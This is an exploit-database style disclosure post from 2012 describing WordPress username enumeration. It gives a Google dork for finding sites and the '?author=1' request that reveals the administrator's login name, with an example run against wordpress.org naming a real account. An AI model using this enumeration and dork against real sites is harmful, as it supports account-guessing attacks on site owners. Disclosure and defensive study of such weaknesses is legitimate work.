Wordpress All Version Wp-Admin Username Vulnerability

2012-09-18 21:17:42
Inviato da: PisTqon

# Exploit Title: Wordpress All Version Wp-Admin Username Vulnerability
# Google Dork: inurl:/?author=1
# Date: 17/09/12
# Exploit Author: PistqoN
# E-Mail: [email protected]
# Software Link: http://wordpress.org/download/
# Version: All
# Tested on: Linux Ubuntu - Windows 7 - Windows Xp
# Video: https://vimeo.com/49694640

# Exploit work on

[+] http://localhost/wordpress/?author=1
[+] Title: Wordpress - admin > http://localhost/wordpress/wp-login.php > Username (admin)

# Online Test

[+] http://www.wordpress.org/?author=1
[+] Title: Wordpress - Matt Mullenweg > http://www.wordpress.org/wp-login.php > Username (Matt Mullenweg)

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.